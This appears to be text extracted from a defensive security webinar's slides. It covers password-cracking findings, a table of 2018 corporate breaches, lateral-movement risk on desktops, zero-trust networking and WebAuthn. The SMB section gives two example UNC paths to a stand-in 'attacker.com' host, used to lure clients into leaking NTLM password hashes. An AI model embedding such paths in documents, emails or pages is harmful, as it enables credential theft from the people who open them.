This webinar describes and analyses data we collected from millions of cracked passwords obtained during attack and penetration tests performed against dozens of corporate customers worldwide... and what that could mean for your organisation!
4. 1/30/2020 4
| Date | Victim | Categories | MTD | State | PWD | Accident | PPI |
|---|---|---|---|---|---|---|---|
| Feb-18 | FedEx | 5 | Possibly | No | No | Yes | Yes |
| Feb-18 | Swisscom | 2 | ? | ? | No | Yes | Yes |
| Feb-18 | Tesla | 3 | Probably | No | No | No | No |
| Feb-18 | City of Houston | 4 | No | ? | No | No | Yes |
| Mar-18 | US universities, companies & government agencies | 4 | Yes | Yes | Yes | No | Yes |
| Mar-18 | Under Armour - MyFitnessPal | 2 | Possibly | ? | Yes | No | Yes |
| Mar-18 | RMH Franchise Holdings (Applebees Restaurants) | 5 | Yes | ? | No | No | Yes |
| Mar-18 | California State University, Fresno | 4 | No | ? | Yes | Yes | Yes |
| Mar-18 | City of Atlanta | 5 | Yes | Yes | Probably | No | Yes |
| Apr-18 | MyEtherWallet.com | 3 | Possibly | ? | Yes | No | Probably |
| Apr-18 | Saks Fifth Avenue and Lord & Taylor | 3 | Yes | No | Probably | No | Yes |
| Apr-18 | Panerabread.com | 6 | Probably | No | No | No | Yes |
| Jun-18 | MyHeritage | 3 | No | ? | Yes | Yes | Yes |
| Jun-18 | Exactis | 3 | Possibly | No | No | Yes | Yes |
| Jun-18 | Ticketmaster | 4 | No | No | No | No | Yes |
| Jun-18 | Adidas | 1 | Possibly | ? | Yes | No | Yes |
| Jul-18 | PIR Bank (Russia) | 4 | Yes | No | Unlikely | No | Yes |
| Jul-18 | mSpy | 3 | No | No | Yes | Yes | Yes |
| Aug-18 | Cosmos Bank | 4 | Possibly | ? | No | No | Yes |
| Sep-18 | British Airways | 4 | No | No | No | No | Yes |
| Sep-18 | Facebook | 1 | No | ? | No | No | Yes |
| Sep-18 | Newegg | 4 | No | No | No | No | Yes |
| Oct-18 | Cathay Pacific | 2 | Yes | ? | No | No | Yes |
| Nov-18 | Marriott | 4 | Yes | Possibly | No | No | Yes |
The real issues
Enabling business transformation
Stopping known exploits
Securing in-house & cloud applications
Changing user behaviour
Insecure endpoints
Know your enemy, Know thyself
Weak authentication
No barriers inside networks
WE THINK IN LISTS. ATTACKERS THINK IN GRAPHS.
https://blogs.technet.microsoft.com/johnla/2015/04/26/defenders-think-in-lists-attackers-think-in-graphs-as-long-as-this-is-true-attackers-win/
SMB Port 445
• Server Message Block (SMB) protocol
• Windows uses it to share files, printers and serial ports
• NTLM authentication is used
• Windows wants to make your life easy
  • This can be used to steal NTLM challenge-response password hashes from SMB clients
• Attackers can trick a target into connecting to their SMB server
  • UNC paths in websites, documents, phishing emails etc
  • For example:
    • \\attacker.com\share-name\file.txt
    • file://///attacker.com/share/folder/file.txt
• The desktop is the target
  • Direct access to user data
• The desktop is the user
  • Inherited privileges on other systems
  • Easy access to domain credentials
  • Direct access to user location, video and audio
• The desktop is a foothold
  • Ideal location for lateral movement and pivoting
  • Numerous channels for exfiltration
  • Excessive event data makes monitoring hard
• The desktop is a soft target
• The desktop is a big target
  • User behaviour creates a complex human-machine system
  • Directly accessible from the Internet!
While most enterprises assume that the internal network is a safe environment in which to expose corporate applications, Google’s experience has proven that this faith is misplaced. Rather, one should assume that an internal network is as fraught with danger as the public Internet and build enterprise applications based upon this assumption.
KNOW who You Are
KNOW your Footprint
KNOW your Threat Model
KNOW your Vulnerabilities
KNOW how you react under assault
KNOW that something happened
KNOW what happened
KNOW what you’re going to do next
Think Authentication
The Web Authentication API (also known as WebAuthn) is a specification written by the W3C and FIDO, with the participation of Google, Mozilla, Microsoft, Yubico, and others. The API allows servers to register and authenticate users using public key cryptography instead of a password.

It allows servers to integrate with the strong authenticators now built into devices, like Windows Hello or Apple’s Touch ID. Instead of a password, a private-public keypair (known as a credential) is created for a website. The private key is stored securely on the user’s device; a public key and a randomly generated credential ID are sent to the server for storage. The server can then use that public key to prove the user’s identity.